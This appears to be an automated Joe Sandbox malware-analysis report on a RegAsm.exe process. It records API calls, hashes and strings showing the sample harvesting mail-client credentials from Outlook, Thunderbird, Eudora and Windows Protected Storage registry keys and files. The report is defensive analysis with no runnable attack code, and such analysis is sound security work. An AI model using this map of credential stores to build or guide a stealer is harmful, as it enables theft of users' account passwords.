                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                      • API String ID: 383090722-1948609170
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                      • Opcode ID: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                                                                                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1961120804-0
                                                                                                                                                                                                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:3%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:21.8%
                                                                                                                                                                                                                      Signature Coverage:0.4%
                                                                                                                                                                                                                      Total number of Nodes:925
                                                                                                                                                                                                                      Total number of Limit Nodes:15
LockResource 34434 405e69 13 API calls 34258 433068 15 API calls __fprintf_l 34436 414a6d 18 API calls 34437 43fe6f 134 API calls 34260 424c6d 15 API calls __fprintf_l 34438 426741 19 API calls 34262 440c70 17 API calls 34263 443c71 43 API calls 34266 427c79 24 API calls 34441 416e7e memset __fprintf_l 34270 42800b 47 API calls 34271 425115 85 API calls __fprintf_l 34444 41960c 61 API calls 34272 43f40c 122 API calls __fprintf_l 34275 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34276 43f81a 20 API calls 34278 414c20 memset memset 34279 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34448 414625 18 API calls 34449 404225 modf 34450 403a26 strlen WriteFile 34452 40422a 12 API calls 34456 427632 memset memset memcpy 34457 40ca30 59 API calls 34458 404235 26 API calls 34280 42ec34 61 API calls __fprintf_l 34281 425115 76 API calls __fprintf_l 34459 425115 77 API calls __fprintf_l 34461 44223a 38 API calls 34287 43183c 112 API calls 34462 44b2c5 _onexit __dllonexit 34467 42a6d2 memcpy __allrem 34289 405cda 65 API calls 34475 43fedc 138 API calls 34476 4116e1 16 API calls __fprintf_l 34292 4244e6 19 API calls 34294 42e8e8 127 API calls __fprintf_l 34295 4118ee RtlLeaveCriticalSection 34481 43f6ec 22 API calls 34297 425115 119 API calls __fprintf_l 34298 410cf3 EnumResourceNamesA 34484 4492f0 memcpy memcpy 34486 43fafa 18 API calls 34488 4342f9 15 API calls __fprintf_l 34299 4144fd 19 API calls 34490 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34491 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34494 443a84 _mbscpy 34496 43f681 17 API calls 34302 404487 22 API calls 34498 415e8c 16 API calls __fprintf_l 34306 411893 RtlDeleteCriticalSection __fprintf_l 34307 41a492 42 API calls 34502 403e96 34 API calls 34503 410e98 memset SHGetPathFromIDList SendMessageA 34309 426741 109 API calls __fprintf_l 34310 4344a2 18 API calls 34311 4094a2 10 API calls 34506 4116a6 15 API calls __fprintf_l 34507 43f6a4 
17 API calls 34508 440aa3 20 API calls 34510 427430 45 API calls 34314 4090b0 7 API calls 34315 4148b0 15 API calls 34317 4118b4 RtlEnterCriticalSection 34318 4014b7 CreateWindowExA 34319 40c8b8 19 API calls 34321 4118bf RtlTryEnterCriticalSection 34515 42434a 18 API calls __fprintf_l 34517 405f53 12 API calls 34329 43f956 59 API calls 34331 40955a 17 API calls 34332 428561 36 API calls 34333 409164 7 API calls 34521 404366 19 API calls 34525 40176c ExitProcess 34528 410777 42 API calls 34338 40dd7b 51 API calls 34339 425d7c 16 API calls __fprintf_l 34530 43f6f0 25 API calls 34531 42db01 22 API calls 34340 412905 15 API calls __fprintf_l 34532 403b04 54 API calls 34533 405f04 SetDlgItemTextA GetDlgItemTextA 34534 44b301 ??3@YAXPAX 34537 4120ea 14 API calls 3 library calls 34538 40bb0a 8 API calls 34540 413f11 strcmp 34344 434110 17 API calls __fprintf_l 34347 425115 108 API calls __fprintf_l 34541 444b11 _onexit 34349 425115 76 API calls __fprintf_l 34352 429d19 10 API calls 34544 444b1f __dllonexit 34545 409f20 _strcmpi 34354 42b927 31 API calls 34548 433f26 19 API calls __fprintf_l 34549 44b323 FreeLibrary 34550 427f25 46 API calls 34551 43ff2b 17 API calls 33219 444b36 33222 444b10 33219->33222 33221 444b3f 33223 444b1f __dllonexit 33222->33223 33224 444b19 _onexit 33222->33224 33223->33221 33224->33223 34552 43fb30 19 API calls 34361 414d36 16 API calls 34363 40ad38 7 API calls 34554 433b38 16 API calls __fprintf_l 34232 44b33b 34233 44b344 ??3@YAXPAX 34232->34233 34234 44b34b 34232->34234 34233->34234 34235 44b354 ??3@YAXPAX 34234->34235 34236 44b35b 34234->34236 34235->34236 34237 44b364 ??3@YAXPAX 34236->34237 34238 44b36b 34236->34238 34237->34238 34239 44b374 ??3@YAXPAX 34238->34239 34240 44b37b 34238->34240 34239->34240 34367 426741 21 API calls 34368 40c5c3 124 API calls 34370 43fdc5 17 API calls 34555 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34373 4161cb memcpy memcpy memcpy memcpy 33234 44b3cf 33235 44b3e6 33234->33235 33237 
44b454 33234->33237 33235->33237 33241 44b40e 33235->33241 33238 44b405 33238->33237 33239 44b435 VirtualProtect 33238->33239 33239->33237 33240 44b444 VirtualProtect 33239->33240 33240->33237 33242 44b413 33241->33242 33247 44b454 33242->33247 33248 44b42b 33242->33248 33244 44b41c 33245 44b435 VirtualProtect 33244->33245 33244->33247 33246 44b444 VirtualProtect 33245->33246 33245->33247 33246->33247 33249 44b431 33248->33249 33250 44b435 VirtualProtect 33249->33250 33251 44b454 33249->33251 33250->33251 33252 44b444 VirtualProtect 33250->33252 33252->33251 34560 43ffc8 18 API calls 34374 4281cc 15 API calls __fprintf_l 34562 4383cc 110 API calls __fprintf_l 34375 4275d3 41 API calls 34563 4153d3 22 API calls __fprintf_l 34376 444dd7 _XcptFilter 34568 4013de 15 API calls 34570 425115 111 API calls __fprintf_l 34571 43f7db 18 API calls 34574 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34378 4335ee 16 API calls __fprintf_l 34576 429fef 11 API calls 34379 444deb _exit _c_exit 34577 40bbf0 138 API calls 34382 425115 79 API calls __fprintf_l 34581 437ffa 22 API calls 34386 4021ff 14 API calls 34387 43f5fc 149 API calls 34582 40e381 9 API calls 34389 405983 40 API calls 34390 42b186 27 API calls __fprintf_l 34391 427d86 76 API calls 34392 403585 20 API calls 34394 42e58e 18 API calls __fprintf_l 34397 425115 75 API calls __fprintf_l 34399 401592 8 API calls 33225 410b92 33228 410a6b 33225->33228 33227 410bb2 33229 410a77 33228->33229 33230 410a89 GetPrivateProfileIntA 33228->33230 33233 410983 memset _itoa WritePrivateProfileStringA 33229->33233 33230->33227 33232 410a84 33232->33227 33233->33232 34586 434395 16 API calls 34401 441d9c memcmp 34588 43f79b 119 API calls 34402 40c599 32 API calls 34589 426741 87 API calls 34406 4401a6 21 API calls 34408 426da6 memcpy memset memset memcpy 34409 4335a5 15 API calls 34411 4299ab memset memset memcpy memset memset 34412 40b1ab 8 API calls 34594 425115 76 API calls __fprintf_l 34598 4113b2 18 API calls 2 library 
calls 34602 40a3b8 memset sprintf SendMessageA 33253 410bbc 33256 4109cf 33253->33256 33257 4109dc 33256->33257 33258 410a23 memset GetPrivateProfileStringA 33257->33258 33259 4109ea memset 33257->33259 33264 407646 strlen 33258->33264 33269 4075cd sprintf memcpy 33259->33269 33262 410a0c WritePrivateProfileStringA 33263 410a65 33262->33263 33265 40765a 33264->33265 33266 40765c 33264->33266 33265->33263 33268 4076a3 33266->33268 33270 40737c strtoul 33266->33270 33268->33263 33269->33262 33270->33266 34414 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                      • API String ID: 379999529-620537770
                                                                                                                                                                                                                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                      • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                      • API String ID: 52128907-4223776976

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                        • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                      • API String ID: 1497257669-167382505

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$??3@DeleteFreeLoadMessageObject
                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                      • API String ID: 910260487-375988210

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad_mbscpy
